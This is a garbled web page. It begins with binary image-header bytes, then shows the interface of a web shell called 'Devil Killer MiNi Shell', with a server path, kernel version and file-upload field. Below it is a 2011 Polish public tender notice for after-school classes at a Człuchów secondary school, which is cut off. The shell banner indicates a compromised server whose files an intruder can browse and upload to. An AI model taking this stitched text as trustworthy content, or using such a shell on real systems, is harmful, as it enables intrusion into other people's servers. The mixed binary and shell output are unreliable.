JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110110/3614-N-2011.html

<p class="kh_header"><b>Człuchów: Prowadzenie zajęć pozalekcyjnych dla uczniów i uczennic Liceum Ogólnokształcącego w Zespole Szkół Ponadgimnazjalnych im. St. Czarnieckiego w Człuchowie w ramach projektu pt. Nie zostanę w tyle! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 3614 - 2011; data zamieszczenia: 10.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Liceum Ogólnokształcące w Zespole Szkół Ponadgimnazjalnych im. St. Czarnieckiego , ul. Kusocińskiego 1, 77-300 Człuchów, woj. pomorskie, tel. 59 83 42 407, faks 59 83 42 407.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://projekt.loczluchow.pl  zakładka zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: oświata - samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć pozalekcyjnych dla uczniów i uczennic Liceum Ogólnokształcącego w Zespole Szkół Ponadgimnazjalnych im. St. Czarnieckiego w Człuchowie w ramach projektu pt. Nie zostanę w tyle! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne pn. Prowadzenie zajęć pozalekcyjnych dla uczniów i uczennic Liceum Ogólnokształcącego w Zespole Szkół Ponadgimnazjalnych im. St. Czarnieckiego w Człuchowie w ramach projektu pt. Nie zostanę w tyle! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.
Przedmiot zamówienia obejmuje poniższe części:
1.	Pozalekcyjne zajęcia profilaktyczne prowadzone przez pedagoga
2.	Pozalekcyjne zajęcia profilaktyczne prowadzone przez psychologa
3.	Pozalekcyjne zajęcia profilaktyczne prowadzone przez inspektora ds. patologii
4.	Pozalekcyjne zajęcia z grafiki komputerowej
5.	Pozalekcyjne zajęcia fitness - aerobik
6.	Pozalekcyjne zajęcia taneczne - taniec tradycyjny i nowoczesny
7.	Pozalekcyjne zajęcia z piłki koszykowej

Miejsce realizacji (dotyczy wszystkich części zamówienia):
77-300 Człuchów,  ul. Kusocińskiego 1
Liceum Ogólnokształcące w Zespole Szkół Ponadgimnazjalnych im. Stefana Czarnieckiego

Forma realizacji usługi:
Po obowiązkowych zajęciach dydaktycznych w dni powszednie, tj. od poniedziałku do piątku.
Ustalenie harmonogramu zajęć pozalekcyjnych, zgodnie z harmonogramem realizacji projektu, nastąpi po podpisaniu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, nie później niż na dzień składania ofert, że:
1.	dysponuje co najmniej jedną osobą do realizacji określonej części zamówienia.
2.	osoba ta spełnia  warunki określone w opisie przedmiotu zamówienia (Dział III SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kalkulacja kosztów usługi - z wykorzystaniem wzoru załącznik nr 4 SWIZ
2. Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w przypadku nie załączenia do oferty
4. Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów- w przypadku nie załączenia do oferty.
5. Program tematyczny zajęć w formie papierowej (druk stanowi Załącznik nr 4 do wzoru umowy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień umowy w zakresie:
1)	kadry dydaktycznej w przypadku wystąpienia sytuacji niezależnych od Wykonawcy i nie możliwych do przewidzenia w dniu zawarcia umowy (np. choroby);
2)	liczby uczestników zajęć i ich imiennego wykazu w sytuacjach, których nie mógł przewidzieć w chwili zawarcia umowy, niezależnych od Zamawiającego.
3)	działania siły wyższej
Warunkiem dokonania zmiany w umowie jest zawiadomienie o zaistnieniu okoliczności wymienionych w pkt. 16.5. w formie pisemnej. Zgodę na dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://projekt.loczluchow.pl      zakładka zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Projektu - gabinet dyrektora Liceum Ogólnokształcącego w ZSP  77 - 300 Człuchów, ul. Kusocińskiego 1  lub na http://projekt.loczluchow.pl w zakładce zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2011 godzina 12:00, miejsce: Sekretariat Liceum Ogólnokształcącego w Zespole Szkół Ponadgimnazjalnych im. St. Czarnieckiego  77 - 300 Człuchów, ul. Kusocińskiego 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. NIE ZOSTANĘ W TYLE! oraz przedmiot zamówienia są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach  Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty  Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, zgodnie z umową o dofinansowanie nr UDA-POKL.09.01.02-22-207/10-00 z dnia 07.09.2010 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pozalekcyjne zajęcia profilaktyczne prowadzone przez pedagoga.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cel zajęć:
Zajęcia mają pomóc uczniom i uczennicom wykazującym problemy w nauce lub posiadającym orzeczone dysfunkcje.
2.	Liczba uczestników:
42 osoby
3.	Obowiązki prowadzącego zajęcia:
1) Ogólna liczba godzin profilaktycznych zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 64 godziny lekcyjne (1 godzina lekcyjna trwa 45 minut zegarowych), tj. 1h/tydzień x 32 tygodnie przez okres dwóch lat kalendarzowych, tj. od stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
4.	Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
-	przygotowanie pedagogiczne - pedagogika opiekuńczo-wychowawcza/resocjalizacja
-	wykształcenie wyższe magisterskie, kierunkowe - odpowiednio do przedmiotu zamówienia,
-	co najmniej roczny staż pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pozalekcyjne zajęcia profilaktyczne prowadzone przez psychologa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel zajęć:
Prowadzone warsztaty mają pomóc uczniom zagrożonym przedwczesnym wypadnięciem z systemu oświaty, wykazującym problemy pedagogiczno-psychologiczne oraz problemy w nauce.
2. Liczba uczestników:
42 osoby
3. Obowiązki prowadzącego zajęcia:
1) Przeprowadzenie 64 godzin profilaktycznych zajęć pozalekcyjnych (1 godzina lekcyjna trwa 45 minut zegarowych) dla uczestników i uczestniczek projektu (1h/tydzień x 32 tygodnie) przez okres dwóch lat kalendarzowych, tj. od stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
4. Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
- przygotowanie pedagogiczne 
- wykształcenie wyższe magisterskie, kierunkowe - odpowiednio do przedmiotu zamówienia    (kwalifikacje zgodnie z ustawą z dnia 08 czerwca 2001 r. o zawodzie psychologa i samorządzie zawodowym psychologów (Dz. U. nr 73 poz. 763 z 2001r.)
- co najmniej roczny staż pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pozalekcyjne zajęcia profilaktyczne prowadzone przez inspektora ds. patologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel zajęć:
Zajęcia mają  pozwolić  uczniom na zaznajomienie się z tematami w dziedzinie profilaktyki zdrowia i terapii uzależnień.
2. Liczba uczestników:
42 osoby
3. Obowiązki prowadzącego zajęcia:
1) Przeprowadzenie 20 godzin profilaktycznych zajęć pozalekcyjnych (1 godzina lekcyjna trwa 45 minut zegarowych) dla uczestników i uczestniczek projektu, tj. 10 h w roku wyłącznie w miesiącach: marzec, kwiecień, czerwiec, wrzesień, listopad po 2h/m-c, przez okres dwóch lat kalendarzowych, tj. od stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
4. Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
- wykształcenie kierunkowe - odpowiednio do przedmiotu zamówienia (wiedza z zakresu terapii uzależnień i profilaktyki uzależnień)
- co najmniej roczny staż pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pozalekcyjne zajęcia z grafiki komputerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel zajęć:
Zajęcia mają  pozwolić  uczniom i uczennicom na zaznajomienie  się  z możliwościami wykorzystania nowoczesnej techniki komputerowej w generowaniu obrazów oraz wizualizacji rzeczywistości.  
2. Liczba uczestników:
15 osób (1 grupa 15 osobowa)
3. Obowiązki prowadzącego zajęcia:
1) Przeprowadzenie 128 godzin zajęć pozalekcyjnych (1 godzina lekcyjna trwa 45 minut zegarowych) dla uczestników i uczestniczek projektu, tj. 2h/tydzień x 32 tygodnie w roku, przez okres dwóch lat kalendarzowych, tj. od stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
4. Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
-	przygotowanie praktyczne w dziedzinie grafiki komputerowej,
-	wykształcenie min. średnie  
-	co najmniej roczny staż pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pozalekcyjne zajęcia fitness - Aerobik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel zajęć:
Dynamiczne i pełne ekspresji zajęcia mają umożliwić uczniom i uczennicom rozładowanie negatywnych emocji i  właściwie wykorzystać czas wolny.

2. Liczba uczestników:
30 osób, tj, 2 grupy 15 osobowe w każdym roku kalendarzowym
3. Obowiązki prowadzącego zajęcia:
1) Przeprowadzenie 256 godzin zajęć pozalekcyjnych (1 godzina lekcyjna trwa 45 minut zegarowych) dla uczestników i uczestniczek projektu, tj. 2h/tydzień x 32 tygodnie w roku x dwie grupy, przez okres dwóch lat kalendarzowych, tj. od stycznia 2011r. do 31 grudnia 2012r.  z wyłączeniem okresów, w których zgodnie z prawem nie odbywają się zajęcia dydaktyczno-wychowawcze.
2) Warunki dodatkowe:
a) opracowanie szczegółowego kwartalnego rozkładu (dni i godziny) realizacji zajęć pozalekcyjnych w formie papierowej i elektronicznej (druk stanowi załącznik nr 3 do wzoru umowy),
b) opracowanie programu tematycznego zajęć w formie papierowej i elektronicznej (druk stanowi Załącznik nr 4 do wzoru umowy),
c) zapewnienie właściwych zasad promocji i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi,
d) sporządzanie karty czasu pracy oraz rachunku do umowy (druki stanowią odpowiednio Załączniki nr 1 i 2 do wzoru umowy),
e) sporządzanie dokumentów, ewaluacji i raportów z prowadzonych zajęć wg potrzeb Zamawiającego
    4. Wykonawca wykaże, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia, tj. posiadającymi:
-	przygotowanie praktyczne w dziedzinie stanowiącej przedmiot zamówienia
-	wykształcenie min. średnie  
-	co najmniej roczny staż pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pozalekcyjne zajęcia taneczne - taniec tradycyjny i nowoczesny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel zajęć:
Dynamiczne i pełne ekspresji zajęcia mają umożliwić uczniom i uczennicom rozładowanie negatywnych emocji i  właściwie wykorzystać czas wolny oraz nauczyć tańca zarówno tradycyjnego, jak i nowoczesnego.

2. Liczba uczestników:
30 osób, tj, 2 grupy 15 osobowe w każdym roku kalendarzowym
